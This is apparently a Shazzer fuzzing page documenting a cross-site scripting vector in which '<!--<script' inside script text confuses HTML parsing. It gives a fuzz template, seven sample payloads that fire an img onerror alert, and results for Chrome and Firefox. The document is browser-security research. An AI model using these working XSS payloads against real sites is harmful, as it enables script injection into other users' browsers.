Fuzzing weird script behaviour after script text
7
7This demonstrates that Shazzer now allows you to fuzz script tags.
Created by: hackvertor
Created on: Thursday, July 18, 2024 at 2:27:30 PM
Updated on: Saturday, December 14, 2024 at 3:13:08 AM
Vector type: XSS
Vector charset: UTF-8
Template used:
<script>
x = "<!--<script$[chr]>"
</script>
<div title="</script><img src=data: onerror=log($[i])>"></div>
Your browser was detected as:
Detecting... Detecting... Detecting... Detecting...
Sample payloads
<script>
x = "<!--<script/>"
</script>
<div title="</script><img src=data: onerror=alert(47)>"></div>
<script>
x = "<!--<script >"
</script>
<div title="</script><img src=data: onerror=alert(9)>"></div>
<script>
x = "<!--<script
>"
</script>
<div title="</script><img src=data: onerror=alert(13)>"></div>
<script>
x = "<!--<script
>"
</script>
<div title="</script><img src=data: onerror=alert(12)>"></div>
<script>
x = "<!--<script
>"
</script>
<div title="</script><img src=data: onerror=alert(10)>"></div>
<script>
x = "<!--<script >"
</script>
<div title="</script><img src=data: onerror=alert(32)>"></div>
<script>
x = "<!--<script>>"
</script>
<div title="</script><img src=data: onerror=alert(62)>"></div>
Fuzz results
Chrome 126.0.0.0 desktop macOS 10.15.7
Updated
Thu Jul 18 2024
Found 7 results
Loading...
Firefox 128.0 desktop macOS 10.15
Updated
Thu Jul 18 2024
Found 7 results
Loading...